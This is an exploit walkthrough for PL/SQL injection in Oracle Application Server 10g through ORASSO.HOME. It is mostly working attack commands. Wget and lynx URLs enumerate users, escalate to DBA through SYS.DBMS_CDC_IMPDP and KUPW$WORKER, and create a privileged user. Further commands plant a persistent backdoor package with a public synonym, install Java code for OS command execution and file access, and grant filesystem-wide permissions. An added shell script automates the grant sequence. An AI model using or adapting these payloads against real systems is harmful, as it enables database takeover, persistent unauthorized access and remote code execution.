Oracle Portal for Friends


Last update date: 22 Jan 2008
First public release: 22 Jan 2008
Author: Ivan Verri aka raist (raist at mediaservice dot net)

Remote exploitation of Oracle Application Server 10g up to 10.1.2.1.0, based on the issue described in:

This example injects through ORASSO.HOME, but these paths also work:

  • JAVA_AUTONOMOUS_TRANSACTION.PUSH
  • XMLGEN.USELOWERCASETAGNAMES
  • PORTAL.WWV_HTP.CENTERCLOSE
  • ORASSO.HOME
  • WWC_VERSION.GET_HTTP_DATABASE_INFO

Information gathering

View current user (should be ORASSO_PUBLIC)

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+USER_USERS"

View roles of current user

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+*+FROM+USER_ROLE_PRIVS"

View full users list

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+username+from+all_users"

View the IP address of the database server

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT('USERENV',+'IP_ADDRESS',+15)+ipaddr+from+dual"

View the hostname of the database server

lynx "http://192.168.100.195:7777/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=select+SYS_CONTEXT('USERENV',+'HOST',+15)+hostname+from+dual"

Exploiting

The user ORASSO_PUBLIC has very few privileges and cannot create procedures, functions or packages, so only a handful of exploits can be used to elevate its privileges: those that need nothing more than an anonymous PL/SQL block.
The other way is to use DBMS_SQL cursors to exploit well-known vulnerabilities without creating any package or function (see exploit #2 below).

Exploit #1 grants DBA to the current user (Oracle 10g R1 and R2 prior to CPU October 2006) through SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE. An error is returned, but the injected INSERT into SYS.SYSAUTH$ (privilege 4 is the DBA role) works anyway. It needs no package: the whole payload is an anonymous block run through EXECUTE IMMEDIATE. Check with the USER_ROLE_PRIVS query above that DBA is now listed.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+SEQUENCE_OWNER+VARCHAR2(200);+SEQUENCE_NAME+VARCHAR2(200);+v_user_id+number;+v_commands+VARCHAR2(32767);+NEW_VALUE+NUMBER;+BEGIN+SELECT+user_id+INTO+v_user_id+FROM+user_users;+v_commands+:=+'insert+into+sys.sysauth\$+'+||+'+values'+||+'('+||+v_user_id+||+',4,'+||+'999,null)';+SEQUENCE_OWNER+:=+'TEST';+SEQUENCE_NAME+:=+''',lockhandle=>:1);'+||+v_commands+||+';commit;+end;--';+NEW_VALUE+:=+1;+SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(SEQUENCE_OWNER+=>+SEQUENCE_OWNER,+SEQUENCE_NAME+=>+SEQUENCE_NAME,+NEW_VALUE+=>+NEW_VALUE);+END;"

Exploit #2 (ab)uses SYS.KUPW$WORKER.MAIN to execute commands as DBA (the package is owned by SYS). This is the cursor technique: the statement to run is first parsed into a DBMS_SQL cursor, and the injected "AND 0=dbms_sql.execute(<cursor>)--" makes the SYS-owned package execute it, so again no package or function has to be created. The example below creates a user pippo; the $ is escaped for the shell.
http://www.milw0rm.com/exploits/3584

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=DECLARE+MYC+NUMBER;+BEGIN+MYC+:=+DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(MYC,'declare+pragma+autonomous_transaction;begin+execute+immediate+''create+user+pippo+identified+by+pippo123'';commit;end;',0);SYS.KUPW\$WORKER.MAIN('''+AND+0=dbms_sql.execute('||myc||')--','.');end;"

Create the user PENTEST identified by PEN123TEST.
Obviously this only works once ORASSO_PUBLIC has been granted DBA (exploit #1 or #2 above).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+USER+PENTEST+IDENTIFIED+BY+PEN123TEST"

Give user PENTEST the Java-related (and a few other) system privileges listed below.
These privileges are needed if you want to use Java to execute O.S. commands and read/write the underlying file system with raptor_oraexec.sql:
http://0xdeadbeef.info/exploits/raptor_oraexec.sql

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+DBA+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVADEBUGPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAIDPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVASYSPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVAUSERPRIV+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+JAVA_ADMIN+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SYSTEM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+SESSION+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+USER+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+JOB+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+USER+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+SYNONYM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+ROLE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+TABLE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+MANAGE+SCHEDULER+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+SELECT+ANY+TABLE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+CLASS+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+LIBRARY+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+ANY+SYNONYM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+ALTER+ANY+PROCEDURE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+LIBRARY+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROGRAM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+GRANT+ANY+PRIVILEGE+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+CREATE+PUBLIC+SYNONYM+TO+PENTEST"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ANY+PROCEDURE+TO+PENTEST"
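Every wget line above, and every lynx query in the information-gathering section, differs only in the SQL carried in the last query-string value. The following helper is an added example, not part of the original page or of raptor_oraexec.sql: it builds the two orasso.home injection URLs from plain SQL (percent-encoding quotes, $ and so on, so no hand-editing with + is needed), drives the whole GRANT list in a loop, and finishes by querying DBA_ROLE_PRIVS through the CELLSPRINT vector to confirm the grants landed rather than trusting wget's exit code. The target host, port and DAD name are the page's lab values and are assumptions; so is the use of the same name for the DAD and the package (orasso/orasso.home).

```shell
#!/bin/sh
# Added example (not part of the original page): build and send the two
# orasso.home injection URLs used on this page from plain SQL, so statements
# need not be hand-encoded with '+'. TARGET and DAD default to the lab values
# used in the page; both are assumptions for your own target.

TARGET="${TARGET:-http://192.168.100.195:7777}"
DAD="${DAD:-orasso}"

# Percent-encode one query-string value. Unreserved characters pass through,
# space becomes '+', everything else (quotes, '$', '<', '>' ...) becomes %XX.
# The input is passed through the environment so awk does not interpret
# backslashes in it. ASCII payloads only.
urlencode() {
    s="$1" LC_ALL=C awk 'BEGIN {
        s = ENVIRON["s"]
        for (n = 1; n < 256; n++) ord[sprintf("%c", n)] = n
        safe = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.~"
        out = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (c == " ")            out = out "+"
            else if (index(safe, c)) out = out c
            else                     out = out sprintf("%%%02X", ord[c])
        }
        print out
    }'
}

# URL for the "execute immediate :1" vector: runs DDL/DML, returns nothing.
# The parameter name ");execute immediate :1;--" is what closes the
# orasso.home(...) call and smuggles the bound statement in.
exec_url() {
    printf '%s/pls/%s/%s.home?);execute+immediate+:1;--=%s\n' \
        "$TARGET" "$DAD" "$DAD" "$(urlencode "$1")"
}

# URL for the OWA_UTIL.CELLSPRINT(:1) vector: runs a SELECT and prints the
# rows into the HTTP response, which is how to confirm a grant really landed.
query_url() {
    printf '%s/pls/%s/%s.home?);OWA_UTIL.CELLSPRINT(:1);--=%s\n' \
        "$TARGET" "$DAD" "$DAD" "$(urlencode "$1")"
}

# Send one statement. With DRYRUN=1 only the URL is printed, which is useful
# for checking the encoding before touching the target.
run_sql() {
    url=$(exec_url "$1")
    if [ -n "${DRYRUN:-}" ]; then
        printf '%s\n' "$url"
    else
        wget -q -O /dev/null "$url"
        printf '%s -> wget exit %d\n' "$1" "$?"
    fi
}

# Fetch the rows of a SELECT through the CELLSPRINT vector.
run_query() {
    if [ -n "${DRYRUN:-}" ]; then
        query_url "$1"
    else
        wget -q -O - "$(query_url "$1")"
    fi
}

# The privilege list from this page, applied to PENTEST in one pass, then
# verified from the database's own catalog.
grant_all() {
    for p in DBA JAVADEBUGPRIV JAVAIDPRIV JAVASYSPRIV JAVAUSERPRIV JAVA_ADMIN \
             "ALTER SYSTEM" "ALTER SESSION" "ALTER USER" "CREATE JOB" \
             "CREATE USER" "CREATE SYNONYM" "GRANT ANY ROLE" "ALTER ANY TABLE" \
             "MANAGE SCHEDULER" "SELECT ANY TABLE" "EXECUTE ANY CLASS" \
             "CREATE ANY LIBRARY" "CREATE ANY SYNONYM" "ALTER ANY PROCEDURE" \
             "EXECUTE ANY LIBRARY" "EXECUTE ANY PROGRAM" "GRANT ANY PRIVILEGE" \
             "CREATE PUBLIC SYNONYM" "EXECUTE ANY PROCEDURE"; do
        run_sql "GRANT $p TO PENTEST"
    done
    run_query "SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE='PENTEST'"
    run_query "SELECT PRIVILEGE FROM DBA_SYS_PRIVS WHERE GRANTEE='PENTEST'"
}

# Usage: ORASSO_RUN=1 DRYRUN=1 sh orasso_inject.sh   (print every URL only)
#        ORASSO_RUN=1 sh orasso_inject.sh            (send grants, then verify)
if [ "${ORASSO_RUN:-}" = "1" ]; then
    grant_all
fi
```

Run it first with DRYRUN=1 and compare the printed URLs with the hand-written ones above; the only differences should be %27 for quotes and %24 for $, which mod_plsql decodes before binding.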

Create a backdoor package that keeps working once the injection is patched, because it will be called directly through mod_plsql rather than through orasso.home.
It is a definer's-rights package owned by PENTEST, so whatever is passed to it runs with PENTEST's DBA privileges no matter who the caller is (here, ORASSO_PUBLIC).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2);END+BACK_PKG;"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE+OR+REPLACE+PACKAGE+BODY+PENTEST.BACK_PKG+AS+PROCEDURE+exec_this_code(commandline+IN+VARCHAR2)+IS+BEGIN+EXECUTE+IMMEDIATE+commandline;+END;+END+BACK_PKG;"

Grant public execute to the backdoor package.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=GRANT+EXECUTE+ON+PENTEST.BACK_PKG+TO+PUBLIC"

Creating a public synonym lets you call the backdoor through mod_plsql under a name that is not on the mod_plsql exclusion list (be sure not to name the synonym with a forbidden prefix such as sys, owa, system, etc.).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=CREATE%20OR%20REPLACE%20PUBLIC%20SYNONYM%20BACKDOOR%20FOR%20PENTEST.BACK_PKG"

Use this syntax to execute commands through the backdoor with PENTEST's DBA privileges (yes, it works via plain http too, and it no longer depends on orasso.home being injectable).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/BACKDOOR.exec_this_code?COMMANDLINE=create%20user%20pippo%20identified%20by%20pippo123"

This is the Java source from raptor_oraexec.sql, used to access the file system and execute OS commands. You can send it on a single command line or cut & paste it as it is. Note that readFile prints with System.out, which inside the Oracle JVM goes to the session trace file unless dbms_java.set_output is enabled, so file contents will not show up in the HTTP response; writeFile and execCommand are the useful ones over mod_plsql.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace and resolve java source named PENTEST.oraexec as
import java.lang.*;
import java.io.*;

public class oraexec
{
    /*
     * Command execution module
     */
    public static void execCommand (String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write(\"\n\");
        fw.close();
    }
}"

Let's create three PL/SQL call specifications on top of the Java source above, to execute commands, read files and write files.

Execute commands

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';"

Read files

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';"

Write (append) to a file

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=create or replace procedure pentest.javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';"

Use dbms_java.grant_permission to give PENTEST read, write and execute rights on the whole file system. Two details: "exec" is a SQL*Plus command and cannot go through EXECUTE IMMEDIATE, so each call is wrapped in an anonymous block; and a bare "/" as the java.io.FilePermission target would match only the root directory itself, so the target is <<ALL FILES>> (as in raptor_oraexec.sql; a recursive "/-" would also do). With JAVASYSPRIV already granted above these are largely redundant, but they are what you need if you kept the Java grants minimal.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=begin dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','<<ALL FILES>>','read'); end;"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=begin dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','<<ALL FILES>>','write'); end;"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=begin dbms_java.grant_permission('PENTEST','SYS:java.io.FilePermission','<<ALL FILES>>','execute'); end;"

Give PUBLIC execute on the three new procedures (pentest.javacmd, pentest.javareadfile, pentest.javawritefile), so the ORASSO_PUBLIC session reached through mod_plsql can call them.

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javacmd to public"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javareadfile to public"

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);execute+immediate+:1;--=grant execute on pentest.javawritefile to public"

Here we go, let's run an OS command (remember to use full paths: the Oracle JVM gives you neither a shell nor a PATH). Nothing the command prints comes back over HTTP, so the first test should be something observable elsewhere, such as pinging a host you control and watching for the ICMP (on Linux add -c so the ping terminates).

wget -q -O /dev/null "http://192.168.100.195:7777/pls/orasso/orasso.home?);pentest.javacmd(:1);--=/usr/sbin/ping 192.168.100.1"
